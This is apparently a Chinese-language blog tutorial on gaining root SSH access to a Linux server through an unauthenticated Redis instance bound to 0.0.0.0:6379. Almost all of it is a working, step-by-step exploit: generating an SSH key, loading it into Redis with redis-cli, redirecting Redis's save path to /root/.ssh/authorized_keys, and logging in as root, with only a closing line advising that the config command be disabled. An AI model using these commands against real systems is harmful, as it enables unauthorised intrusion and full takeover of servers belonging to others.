熟悉linux ssh应该知道可以在authorized_keys添加自己的共有密钥以达到免密码登录系统的目的。本文将展现如何通过redis漏洞达到入侵系统的目的。

前提

redis 开放端口:0.0.0.0:6379

smou:_posts $ ps x|grep redis
29251   ??  S      0:00.04 /usr/local/opt/redis/bin/redis-server 0.0.0.0:6379

入侵过程

1. 创建公钥~/.ssh/id_rsa.pub,有则跳过
ssh-keygen -t rsa

一路确认就行

2. 生成前面带有双换行的临时文件

进入~/.ssh/

echo -n -e '\n\n' > 2 && cat id_rsa.pub >>2
3. 入侵
# 设置key, crackit = 2文件内容
cat 2 | redis-cli -h 192.168.12.101 -x set crackit 

# 连接服务器
redis-cli -h 192.168.12.101

# 设置目录(注意是用户的home目录,不一定root)
config set dir /root/.ssh

# 设置文件名
config set dbfilename authorized_keys

# 保存
save
4. 登录

这时候通过 ssh root@192.168.12.101 就能进入系统,接下来就可以为所欲为.

总结

所以使用redis,注意关闭config功能,否则,就要等着哭了。